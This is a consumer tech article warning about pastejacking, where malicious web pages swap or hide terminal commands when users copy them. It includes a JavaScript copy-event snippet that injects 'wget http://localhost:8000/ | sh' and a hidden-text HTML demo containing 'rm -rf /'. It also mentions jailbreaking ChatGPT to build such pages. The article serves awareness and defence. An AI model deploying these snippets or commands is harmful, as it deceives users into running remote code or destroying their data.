No menu items!

Why You Shouldn’t Copy-Paste Commands From the Internet

From computers to mobile phones, copy-pasting is prevalent everywhere. It makes life easier and saves you time as you don’t have to type long commands or redundant texts. However, if you aren’t careful enough, you can get hacked by simply copy-pasting commands on your computer’s terminal.

Let’s learn how copying and pasting can get you hacked, and what you should do to prevent it.

Why You Shouldn’t Copy-Paste Commands

Whether you’re new to using the command line or you’re a seasoned veteran, you may be tempted to copy-paste commands from the internet to save your time and get actual work done. However, you should be aware that malicious sites are actually weaponizing code boxes to inject malicious code whenever you copy-paste commands directly into the terminal.

These malicious actors are using various frontend tricks to conceal malicious commands behind harmless-looking code.

A command like sudo apt-get update && apt-get upgrade should normally update the repositories and upgrade the packages on a Linux system. However, if you’re unaware and copy-paste this command directly into your terminal, you might be unknowingly executing malware code with root privileges due to the sudo prefix.

In the worst-case scenario, this could possibly result in a complete takeover of your system or even a ransomware attack. But, how do the threat actors do this? How can malicious commands be hidden behind harmless code?

How Malicious Code Exploits Work

PoC of exploit

This exploit can be carried out using cleverly crafted JavaScript or even basic HTML. JavaScript has a mechanism called EventListener. Events are actions that can happen in the browser, such as clicking a button, submitting a form, mouse movement, pressing keystrokes, or resizing the window.

The EventListener, as the name suggests, enables your web application to react to certain events triggered by user action. Malicious webpages exploit this legitimate and useful mechanism by capturing the event where a user is copying text and replacing the harmless text with malicious code.

Here’s the main exploit code used to build the demo image:

document.addEventListener('copy', function(event) {
  const copiedText = "wget http://localhost:8000/ | sh";
  event.clipboardData.setData('text/plain', copiedText);

Here’s another demo, that doesn’t require any JavaScript and uses vanilla HTML:

sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>


This creates an invisible white text, effectively hiding the malicious command “rm -rf /” and the <br> tag creates a line break so that some terminals will immediately execute the code upon pasting it. You might think that a strong grasp of programming and web development skills are required to carry out this attack but, in reality, it’s actually quite easy.

Even if an attacker doesn’t have any knowledge of JavaScript or web development, they can easily create malware using ChatGPT. With the right prompts, one can easily jailbreak ChatGPT and make it create malicious web pages that make use of this trick.

How You Can Protect Yourself

blurred photo of blue and purple computer coding

There’s no concrete way to protect yourself against malicious code attacks. Sure, you can disallow JavaScript for suspicious sites but, by their nature, they probably wouldn’t allow you to browse without JavaScript turned on.

Moreover, for the CSS (Cascading Style Sheets) method, there’s no concrete defense against malicious commands since it’s still valid CSS code (i.e. there’s nothing wrong with it but the intent is still malicious). The best way to protect yourself would be just to follow basic internet hygiene and have your wits about you.

Don’t visit unknown links and make sure to always paste the command you’re copying from the internet into a text editor before pasting it into the terminal. Stick to legitimate and reputable code resources to make sure you’re not welcoming malicious code into your command line.

Additionally, a few terminals, like the xfce4-terminal come pre-equipped with copy-paste protection. It will display a pop-up that will tell you exactly what will be executed as soon as you paste a command in your terminal. Check if your terminal too has a similar mechanism and activate it.

Malicious Code Execution Is Highly Dangerous

Even if you’ve got antivirus installed, certain forms of malicious code execution can still penetrate your device’s protective barriers. This is why it’s crucial to be wary of the code you copy online and employ protective measures wherever possible to keep yourself safe.


How to Use ChatGPT as a Detailed and Interactive Text-Based RPG

OpenAI’s ChatGPT is arguably the most advanced AI currently...

4 New Threats Targeting Macs in 2023 and How to Avoid Them

The past decade has witnessed a drastic change in...

What Are Improper Error Handling Vulnerabilities?

Do you know that little things like the errors...

5 AI-Powered Book Recommendation Sites and Apps to Find Your Next Read

Can ChatGPT find the best next book that you...

What Is Forefront AI and Is It Better Than ChatGPT?

Key Takeaways Forefront AI is an online...